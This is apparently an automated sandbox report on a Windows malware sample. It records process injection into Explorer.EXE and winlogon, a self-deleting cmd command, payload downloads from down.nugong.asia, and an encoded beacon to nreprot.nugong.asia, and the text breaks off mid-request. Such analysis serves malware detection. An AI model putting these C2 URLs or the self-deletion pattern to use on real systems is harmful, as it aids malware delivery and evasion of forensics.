description pid Process procid_target PID 2512 wrote to memory of 1304 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 22 PID 2512 wrote to memory of 1304 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 22 PID 2512 wrote to memory of 1304 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 22 PID 2512 wrote to memory of 1304 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 22 PID 2512 wrote to memory of 1304 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 22 PID 1304 wrote to memory of 2788 1304 Explorer.EXE 29 PID 1304 wrote to memory of 2788 1304 Explorer.EXE 29 PID 1304 wrote to memory of 2788 1304 Explorer.EXE 29 PID 1304 wrote to memory of 2788 1304 Explorer.EXE 29 PID 1304 wrote to memory of 2788 1304 Explorer.EXE 29 PID 1304 wrote to memory of 2788 1304 Explorer.EXE 29 PID 1304 wrote to memory of 2788 1304 Explorer.EXE 29 PID 1304 wrote to memory of 2788 1304 Explorer.EXE 29 PID 2512 wrote to memory of 420 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 2 PID 2512 wrote to memory of 420 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 2 PID 2512 wrote to memory of 420 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 2 PID 2512 wrote to memory of 420 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 2 PID 2512 wrote to memory of 420 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 2 PID 2512 wrote to memory of 692 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 31 PID 2512 wrote to memory of 692 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 31 PID 2512 wrote to memory of 692 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 31 PID 2512 wrote to memory of 692 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 31 PID 692 wrote to memory of 2880 692 cmd.exe 33 PID 692 wrote to memory of 2880 692 cmd.exe 33 PID 692 wrote to memory of 2880 692 cmd.exe 33 PID 692 wrote to memory of 2880 692 cmd.exe 33 PID 2788 wrote to memory of 1304 2788 charmap.exe 22 PID 2788 wrote to memory of 1304 2788 charmap.exe 22 PID 2788 wrote to memory of 1304 2788 charmap.exe 22 PID 2788 wrote to memory of 1304 2788 charmap.exe 22
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:420
-
C:\ProgramData\autofmt.exe"C:\ProgramData\autofmt.exe"2⤵
- Executes dropped EXE
PID:2688
-
-
C:\charmap.exe"C:\charmap.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2788
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Users\Admin\AppData\Local\Temp\aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe"C:\Users\Admin\AppData\Local\Temp\aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe"2⤵
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 1 & del /Q /F "C:\Users\Admin\AppData\Local\Temp\aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe"3⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Windows\SysWOW64\timeout.exetimeout /t 14⤵
- Delays execution with timeout.exe
PID:2880
-
-
-
Network
-
DNS54e03c235962947852b3fe22714547f2.vbnm34567.xyzaadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exeRemote address:8.8.8.8:53Request54e03c235962947852b3fe22714547f2.vbnm34567.xyzIN AResponse
-
DNS54e03c235962947852b3fe22714547f2.vbnm34567.xyzaadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exeRemote address:8.8.8.8:53Request54e03c235962947852b3fe22714547f2.vbnm34567.xyzIN AResponse
-
Remote address:114.114.114.114:53Requestdown.nugong.asiaIN AResponsedown.nugong.asiaIN CNAMEdown.nugong.asia.cdn.dnsv1.com.cndown.nugong.asia.cdn.dnsv1.com.cnIN CNAMEofgk41rd.slt.sched.tdnsv8.comofgk41rd.slt.sched.tdnsv8.comIN A119.167.229.212ofgk41rd.slt.sched.tdnsv8.comIN A123.12.213.220ofgk41rd.slt.sched.tdnsv8.comIN A123.12.213.243ofgk41rd.slt.sched.tdnsv8.comIN A211.93.212.232ofgk41rd.slt.sched.tdnsv8.comIN A218.29.50.234ofgk41rd.slt.sched.tdnsv8.comIN A221.15.67.145ofgk41rd.slt.sched.tdnsv8.comIN A36.248.54.85ofgk41rd.slt.sched.tdnsv8.comIN A123.12.213.187ofgk41rd.slt.sched.tdnsv8.comIN A118.212.235.109ofgk41rd.slt.sched.tdnsv8.comIN A58.144.226.248ofgk41rd.slt.sched.tdnsv8.comIN A110.249.196.101ofgk41rd.slt.sched.tdnsv8.comIN A118.212.235.102ofgk41rd.slt.sched.tdnsv8.comIN A42.56.81.104ofgk41rd.slt.sched.tdnsv8.comIN A118.212.235.231ofgk41rd.slt.sched.tdnsv8.comIN A42.231.136.215
-
Remote address:119.167.229.212:80RequestGET /cfg/cmc/ping.txt HTTP/1.1
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "bdf198e2733b39eae21f211114395f67"
Content-Type: text/plain
Date: Thu, 14 Sep 2023 14:23:31 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 3269775211629437622
x-cos-meta-md5: bdf198e2733b39eae21f211114395f67
x-cos-request-id: NjUwMzE3NjNfYTRmN2QxZV8yY2Q3M19mYzMzYTM=
Content-Length: 16
Accept-Ranges: bytes
X-NWS-LOG-UUID: 7129195975271880907
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address:119.167.229.212:80RequestGET /cfg/cmc/ping.txt HTTP/1.1
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "bdf198e2733b39eae21f211114395f67"
Content-Type: text/plain
Date: Thu, 14 Sep 2023 14:23:31 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 3269775211629437622
x-cos-meta-md5: bdf198e2733b39eae21f211114395f67
x-cos-request-id: NjUwMzE3NjNfYTRmN2QxZV8yY2Q3M19mYzMzYTM=
Content-Length: 16
Accept-Ranges: bytes
X-NWS-LOG-UUID: 7041402496685730997
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address:119.167.229.212:80RequestGET /cfg/cmc/userchange.txt HTTP/1.1
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "fc45e837e3ce86dbec3d2c37cf4902de"
Content-Type: text/plain
Date: Tue, 10 Oct 2023 09:20:23 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 12006462995938776668
x-cos-request-id: NjUyNTE3NTdfNGYyZmIwMDlfZWY3ZV82NGJlNTU2
Content-Length: 80
Accept-Ranges: bytes
X-NWS-LOG-UUID: 1752883517681810299
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address:119.167.229.212:80RequestGET /cfg/cmc/userpq.zip HTTP/1.1
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "adc490d0b07f1be911590c5b795aebea"
Content-Type: application/zip
Date: Sun, 15 Oct 2023 12:15:13 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 2623325120400499928
x-cos-request-id: NjUyYmQ3ZDFfNjNlZjk4MWVfMTM2MGFfNDFmMzk2ZA==
Content-Length: 14048
Accept-Ranges: bytes
X-NWS-LOG-UUID: 5713177746948184236
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address:119.167.229.212:80RequestGET /cfg/cmc/blacklist.txt HTTP/1.1
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "634229b217016f7ddbec9e50e2b2215a"
Content-Type: text/plain
Date: Tue, 14 Nov 2023 10:02:22 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 10822492973310145922
x-cos-request-id: NjU1MzQ1YWVfZWM0Y2JlMDlfYzBhY182ZDkxNjY1
Content-Length: 14128
Accept-Ranges: bytes
X-NWS-LOG-UUID: 11368800093448790513
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address:119.167.229.212:80RequestGET /cfg/user/c995ec7fd4f57c0d/a8f5d6fe5664609d.json HTTP/1.1
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "20b0141db067e42fab5d126b516ce8fc"
Content-Type: application/json
Date: Mon, 13 Nov 2023 05:39:43 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 6759049951230011836
x-cos-request-id: NjU1MWI2OWZfZDk5M2M1MDlfZDRkYl82YWU4ODgx
Content-Length: 5536
Accept-Ranges: bytes
X-NWS-LOG-UUID: 11897375171845853590
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address:119.167.229.212:80RequestGET /cfg/pub/ms.json HTTP/1.1
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "90c471dc2bc4708513d3942620d62b50"
Content-Type: application/json
Date: Thu, 16 Nov 2023 11:58:51 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 85938580248757588
x-cos-request-id: NjU1NjAzZmFfNjhlZTk4MWVfYjA4Y183N2JmY2Zl
Content-Length: 70816
Accept-Ranges: bytes
X-NWS-LOG-UUID: 7949643104443966097
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address:119.167.229.212:80RequestGET /cfg/pub/ps.json HTTP/1.1
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "da98b3f975d47ac8f8c82c818e2918f0"
Content-Type: application/json
Date: Thu, 16 Nov 2023 11:58:56 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 17045325299171296767
x-cos-request-id: NjU1NjA0MDBfYzMyNjgwOV8xMTZjXzk1OTU0OWE=
Content-Length: 14496
Accept-Ranges: bytes
X-NWS-LOG-UUID: 16963553139638466009
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
GEThttp://down.nugong.asia/pgm/mds/186dc678628340ee/90a22928787e3b5a341729d845ab26d5f93b9db0120714d864.zipcharmap.exeRemote address:119.167.229.212:80RequestGET /pgm/mds/186dc678628340ee/90a22928787e3b5a341729d845ab26d5f93b9db0120714d864.zip HTTP/1.1
Host: down.nugong.asia
User-Agent: CHM_MSDN
ResponseHTTP/1.1 200 OK
Etag: "a84b646b1d930ce01381ef358a7553eb"
Content-Type: application/zip
Date: Mon, 13 Nov 2023 05:37:42 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 15716088766820099200
x-cos-request-id: NjU1MWI2MjZfNjMyNjgwOV8yZjdiXzcyNjM4ZWE=
Content-Length: 776248
Accept-Ranges: bytes
X-NWS-LOG-UUID: 500760231856281183
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
GEThttp://down.nugong.asia/pgm/mds/05631e93ccdb00ee/945f98f10df53a8f1cfb3848c371d6e3829473480dc6631564.zipcharmap.exeRemote address:119.167.229.212:80RequestGET /pgm/mds/05631e93ccdb00ee/945f98f10df53a8f1cfb3848c371d6e3829473480dc6631564.zip HTTP/1.1
Host: down.nugong.asia
User-Agent: CHM_MSDN
ResponseHTTP/1.1 200 OK
Etag: "8cea813a8866e2b77e93c2a847204979"
Content-Type: application/zip
Date: Sat, 21 Oct 2023 09:04:02 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 5924644156334808127
x-cos-request-id: NjUzMzk0MDJfNWJlZDk4MWVfYmVkOV80Y2M2YjJi
Content-Length: 553108
Accept-Ranges: bytes
X-NWS-LOG-UUID: 17693798271994959229
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
GEThttp://down.nugong.asia/pgm/mds/006866ef1b75dc55/30d51089d778d32a4d22077fb983ba81fd82d4cf417ac62464.zipcharmap.exeRemote address:119.167.229.212:80RequestGET /pgm/mds/006866ef1b75dc55/30d51089d778d32a4d22077fb983ba81fd82d4cf417ac62464.zip HTTP/1.1
Host: down.nugong.asia
User-Agent: CHM_MSDN
ResponseHTTP/1.1 200 OK
Etag: "d3ee55c63ac9cfa7fd408553f9369f5b"
Content-Type: application/zip
Date: Fri, 18 Aug 2023 07:42:38 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 11311802544265698830
x-cos-request-id: NjRkZjIwZWVfNTY1N2JiMDlfOGQ0Nl8zNGUyMDQ3
Content-Length: 902517
Accept-Ranges: bytes
X-NWS-LOG-UUID: 1174372281419468057
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address:119.167.229.212:80RequestGET /cfg/cmc/Lander.txt HTTP/1.1
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "2b0a274c713e2dbc2e5cbaeb685b7cb9"
Content-Type: text/plain
Date: Thu, 02 Nov 2023 08:57:25 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 5524331398157289202
x-cos-request-id: NjU0MzY0NzVfY2E5ZjA4MDlfMWVjYV82MDE2NWI1
Content-Length: 25440
Accept-Ranges: bytes
X-NWS-LOG-UUID: 12967380852860782898
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address:119.167.229.212:80RequestGET /cfg/cmc/psexe.txt HTTP/1.1
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "bbf519b79b44c56a5e57f25e7c9c2b09"
Content-Type: text/plain
Date: Thu, 16 Nov 2023 10:22:59 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 3618226480165307532
x-cos-request-id: NjU1NWVkODNfYTMzMjY4MDlfZTNlNl83NGY0NzVl
Content-Length: 17552
Accept-Ranges: bytes
X-NWS-LOG-UUID: 13708709213316926661
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address:119.167.229.212:80RequestGET /cfg/cmc/urlmd5.json HTTP/1.1
Host: down.nugong.asia
ResponseHTTP/1.1 200 OK
Etag: "af00c53c210fdf6c89a35e31fab90718"
Content-Type: application/json
Date: Thu, 16 Nov 2023 12:02:58 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 17454991016677689058
x-cos-request-id: NjU1NjA0ZjJfNzljZDExMGJfMmYzNzhfZTM1MzcxZA==
Content-Length: 656
Accept-Ranges: bytes
X-NWS-LOG-UUID: 7984560787863337585
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
Remote address:8.8.8.8:53Requestapps.game.qq.comIN AResponseapps.game.qq.comIN A101.227.134.49apps.game.qq.comIN A101.227.134.27
-
Remote address:101.227.134.49:443RequestGET /comm-htdocs/ip/get_ip.php HTTP/1.1
Accept-Encoding: gzip, deflate
Host: apps.game.qq.com
Connection: Close
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 49
Connection: close
Server: swoole-http-server
Content-Encoding: gzip
-
Remote address:8.8.8.8:53Requestocsp.trust-provider.cnIN AResponseocsp.trust-provider.cnIN CNAMEocsp.trust-provider.cn.c.vedcdnlb.comocsp.trust-provider.cn.c.vedcdnlb.comIN CNAMEbd-l7-online-tob-oversea-opt.s.vedsalb.combd-l7-online-tob-oversea-opt.s.vedsalb.comIN A36.143.236.7bd-l7-online-tob-oversea-opt.s.vedsalb.comIN A36.248.38.100bd-l7-online-tob-oversea-opt.s.vedsalb.comIN A111.13.153.152bd-l7-online-tob-oversea-opt.s.vedsalb.comIN A111.48.138.18bd-l7-online-tob-oversea-opt.s.vedsalb.comIN A111.206.23.199bd-l7-online-tob-oversea-opt.s.vedsalb.comIN A112.50.95.96bd-l7-online-tob-oversea-opt.s.vedsalb.comIN A117.27.246.96bd-l7-online-tob-oversea-opt.s.vedsalb.comIN A119.36.90.164
-
GEThttp://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3Daadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exeRemote address:36.143.236.7:80RequestGET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.trust-provider.cn
ResponseHTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 599
Connection: keep-alive
Date: Thu, 16 Nov 2023 12:03:31 GMT
Age: 1
CF-Cache-Status: EXPIRED
CF-RAY: 826669fd7cf5ce8c-SJC
ETag: "5f2fef2f2105260951d9c24345a955796b1fd5d7"
Expires: Wed, 22 Nov 2023 09:19:05 GMT
Last-Modified: Wed, 15 Nov 2023 09:19:06 GMT
WS-Cache-Status: 0
X-CCACDN-Proxy-ID: scdpinlb4
X-Frame-Options: SAMEORIGIN
X-Via: 1.1 PS-CZX-01YIQ141:4 (Cdn Cache Server V2.0), 1.1 PS-PEK-01GFt24:12 (Cdn Cache Server V2.0)
X-Ws-Request-Id: 655603c5_PS-PEK-01GFt24_25725-26234
cache-via: cache.n173-145-133.bdcdn-hbcdcm02
x-request-ip: 154.61.71.13
x-tt-trace-tag: id=5
x-dsa-trace-id: 17001362117a57cebda9528039b01ac55e0e39b8e3
X-Bdsa-Cache-Status: HIT
Cache-Via-Status: cache.n173-145-133.bdcdn-hbcdcm02(HIT)
X-Bdsa-Cache-Tm: 1700135877-3266
Accept-Ranges: bytes
via: n173-145-133.bdcdn-hbcdcm02.ToB
X-Dsa-Origin-Status: 200
server-timing: cdn-cache;desc=HIT, origin;dur=0, edge;dur=0
-
Remote address:8.8.8.8:53Requestocsp.digicert.cnIN AResponseocsp.digicert.cnIN CNAMEocsp.digicert.cn.w.cdngslb.comocsp.digicert.cn.w.cdngslb.comIN A47.246.48.205
-
GEThttp://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3Dcharmap.exeRemote address:47.246.48.205:80RequestGET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.digicert.cn
ResponseHTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 471
Connection: keep-alive
Cache-Control: max-age=7200
Date: Thu, 16 Nov 2023 11:43:02 GMT
Ali-Swift-Global-Savetime: 1700134982
Via: cache2.l2de2[0,0,200-0,H], cache12.l2de2[0,0], cache5.nl2[0,0,200-0,H], cache7.nl2[1,0]
Age: 1229
X-Cache: HIT TCP_MEM_HIT dirn:1:348365936
X-Swift-SaveTime: Thu, 16 Nov 2023 11:43:02 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 2ff6309b17001362112167865e
-
GEThttp://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3Dcharmap.exeRemote address:47.246.48.205:80RequestGET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.digicert.cn
ResponseHTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 471
Connection: keep-alive
Cache-Control: max-age=7200
Date: Thu, 16 Nov 2023 11:43:25 GMT
Ali-Swift-Global-Savetime: 1700135005
Via: cache5.l2de2[14,14,200-0,M], cache4.l2de2[16,0], cache8.nl2[0,0,200-0,H], cache7.nl2[1,0]
Age: 1206
X-Cache: HIT TCP_MEM_HIT dirn:1:423183860
X-Swift-SaveTime: Thu, 16 Nov 2023 11:43:25 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 2ff6309b17001362113278050e
-
Remote address:8.8.8.8:53Requestsp1.baidu.comIN AResponsesp1.baidu.comIN CNAMEwww.a.shifen.comwww.a.shifen.comIN CNAMEwww.wshifen.comwww.wshifen.comIN A103.235.47.7www.wshifen.comIN A103.235.47.102www.wshifen.comIN A103.235.47.103www.wshifen.comIN A103.235.46.40
-
GEThttps://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=jsoncharmap.exeRemote address:103.235.47.7:443RequestGET /8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json HTTP/1.1
Accept-Encoding: gzip
User-Agent: CHM_MSDN
Host: sp1.baidu.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Length: 354
Content-Type: application/json;charset=gbk
Date: Thu, 16 Nov 2023 12:03:47 GMT
Expires: Thu, 16 Nov 2023 12:03:47 GMT
P3p: CP=" OTI DSP COR IVA OUR IND COM "
P3p: CP=" OTI DSP COR IVA OUR IND COM "
Server: Apache
Set-Cookie: BAIDUID=39C61BC447B3055DFAFABCC695373CB5:FG=1; expires=Fri, 15-Nov-24 12:03:47 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Set-Cookie: BAIDUID=A028277FD5A679FD6E47394ADB1A61E6:FG=1; expires=Fri, 15-Nov-24 12:03:47 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Tracecode: 02270995930429029386111620
Tracecode: 02271004770274315530111620
X-Powered-By: HHVM
-
Remote address:8.8.8.8:53Requestcrl.globalsign.comIN AResponsecrl.globalsign.comIN CNAMEglobal.prd.cdn.globalsign.comglobal.prd.cdn.globalsign.comIN CNAMEcdn.globalsigncdn.com.cdn.cloudflare.netcdn.globalsigncdn.com.cdn.cloudflare.netIN A104.18.20.226cdn.globalsigncdn.com.cdn.cloudflare.netIN A104.18.21.226
-
Remote address:104.18.20.226:80RequestGET /root-r3.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.globalsign.com
ResponseHTTP/1.1 200 OK
Content-Type: application/pkix-crl
Content-Length: 2059
Connection: keep-alive
Last-Modified: Fri, 20 Oct 2023 00:00:00 GMT
ETag: 3A
Expires: Mon, 15 Jan 2024 00:00:00 GMT
Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
CF-Cache-Status: HIT
Age: 3266
Accept-Ranges: bytes
Server: cloudflare
CF-RAY: 826f97a13a976657-AMS
-
GEThttp://ocsp2.globalsign.com/rootr3/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBT1nGh%2FJBjWKnkPdZIzB1bqhelHBwQUj%2FBLf6guRSSuTVD6Y5qL3uLdG7wCDQHuXyId%2FGI71DM6hVc%3Dcharmap.exeRemote address:104.18.21.226:80RequestGET /rootr3/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBT1nGh%2FJBjWKnkPdZIzB1bqhelHBwQUj%2FBLf6guRSSuTVD6Y5qL3uLdG7wCDQHuXyId%2FGI71DM6hVc%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp2.globalsign.com
ResponseHTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 1431
Connection: keep-alive
Expires: Mon, 20 Nov 2023 09:48:46 GMT
ETag: "b87def254cfbd1e1c7bbefdf93d58976a152baa5"
Last-Modified: Thu, 16 Nov 2023 09:48:47 GMT
Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
CF-Cache-Status: HIT
Age: 2094
Accept-Ranges: bytes
Server: cloudflare
CF-RAY: 826f97e64c3db96f-AMS
-
GEThttp://down.nugong.asia/pgm/mds/b9aa4771a06003c1/4c3c71ab6fb06a3ec85c07a85e2af9e361998acec86eaa1e64.zipcharmap.exeRemote address:119.167.229.212:80RequestGET /pgm/mds/b9aa4771a06003c1/4c3c71ab6fb06a3ec85c07a85e2af9e361998acec86eaa1e64.zip HTTP/1.1
Host: down.nugong.asia
User-Agent: CHM_MSDN
ResponseHTTP/1.1 200 OK
Etag: "2984d7173c0ef353247c5882127b6dea"
Content-Type: application/zip
Date: Wed, 18 Oct 2023 02:37:24 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 4837415142414469027
x-cos-request-id: NjUyZjQ0ZTRfMmVjYzExMGJfYzc0MV84OTBhYWE4
Content-Length: 153522
Accept-Ranges: bytes
X-NWS-LOG-UUID: 2161620244003400841
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
GEThttp://down.nugong.asia/pgm/mds/62761afc2f0d796a/2087d126bded15fb341729d845ab26d5124b01e56782ef7664.zipcharmap.exeRemote address:119.167.229.212:80RequestGET /pgm/mds/62761afc2f0d796a/2087d126bded15fb341729d845ab26d5124b01e56782ef7664.zip HTTP/1.1
Host: down.nugong.asia
User-Agent: CHM_MSDN
ResponseHTTP/1.1 200 OK
Etag: "33a70d7d11445ae0e98eea790c06fdd0"
Content-Type: application/zip
Date: Mon, 13 Nov 2023 05:39:21 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 17548609442877028985
x-cos-request-id: NjU1MWI2ODlfYjczNTY4MDlfMWJhNV82YWQzNjc5
Content-Length: 980299
Accept-Ranges: bytes
X-NWS-LOG-UUID: 1647302354324036148
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
GEThttp://down.nugong.asia/pgm/mds/865609897d54b79b/502855f63d5364d77a01f5e8125b4fe59af4f34fd4851c3764.zipcharmap.exeRemote address:119.167.229.212:80RequestGET /pgm/mds/865609897d54b79b/502855f63d5364d77a01f5e8125b4fe59af4f34fd4851c3764.zip HTTP/1.1
Host: down.nugong.asia
User-Agent: CHM_MSDN
ResponseHTTP/1.1 200 OK
Etag: "c54f8dd4a616b44898e054837fe698bc"
Content-Type: application/zip
Date: Wed, 18 Oct 2023 02:37:24 GMT
Server: tencent-cos
x-cos-hash-crc64ecma: 11477013737684468114
x-cos-request-id: NjUyZjQ0ZTRfYjQ5ZjA4MDlfYjc4M180NWFjN2M1
Content-Length: 153529
Accept-Ranges: bytes
X-NWS-LOG-UUID: 16758888000343519892
Connection: keep-alive
X-Cache-Lookup: Cache Hit
-
GEThttp://nreprot.nugong.asia/report/report_data?data=b26a79cea204f54a9c370b6a1cccc50b5bb992835b01fa10452c1698483b553b4ecd305bdb80e30556bab29d9ba195bc7bc425e6c3a804fc8bdd9aa5cee13373d3a8a13b86b22f6aea7db0c272a92108cf7c966ec1eccdeb593526ac8f755910c04aca2c7a3f39c378f01a4751e77a7009a7a10d3d84969ce72f245e6122069982534a4a432e7b61fff47230c8b5824ca5ef63f534d272b5f34582aa287656a831207e053344fd01d723f227f882cdcccb67fc75af9b657a95f61a3df209afa47ae8d60efbb076a5c109c87ede643cf4b4f8e713b5cf2e8c2844bb4914a3a3fcfbeae9da6cd101082eea80d9643860c6c02fe0a87c82927cab3946545e2e1c00ffa7dc35dde4b8a7c6cea977c468cf5558d7b5fa41e180ffe0ed3f5740fe236accf4a104cc54fac8007c3343247e6e40a657d3a3bb35005efd9b3bc962b98bef31e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477cdc4e777cfcca46bb56e16d20d65e3ee7660bf3c537d0053b77c03eaa4923a06508288210481b5150330b26ef92ca523a743d1b3264d937bc2c115085abd46b8eae6ec9c6f288b201f198a8d3977c5dade52cb1bd1e9d4b257afb8be23307c5c51199d3bf86790578155e9069f078b6b30d30d3a11649c2629418689e87302c7f30f094c60c5a7b3d6d0f4fbb03cd1360b4ca7ff4ef710ea4c18c7b1f75c0ef0ee926d4fe67aee11fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12charmap.exeRemote address:119.167.229.212:80RequestGET 